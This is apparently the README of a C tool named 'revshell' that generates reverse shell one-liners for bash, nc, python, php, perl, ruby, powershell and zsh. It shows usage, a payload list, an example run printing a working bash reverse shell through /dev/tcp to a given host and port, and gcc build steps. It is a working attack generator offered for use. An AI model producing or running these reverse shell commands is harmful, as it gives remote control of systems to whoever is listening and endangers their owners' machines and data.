Reverse shell generator with simple one-line commands.
▶ ./revshell
Produced by Nosferatuvjr, feel free to use it, but please credit me.
v0.1
Usage: revshell.c <host> <port> <number of payload>
Payload list:
1. bash
2. nc
3. rm /tmp/f
4. python
5. php
6. perl
7. ruby
8. powershell
9. zsh
▶ ./revshell 192.168.0.1 1234 1
- bash -i >& /dev/tcp/192.168.0.1/1234 0>&1
Compile it yourself or use pre-compiled binary from releases section.
gcc revshell.c -o revshell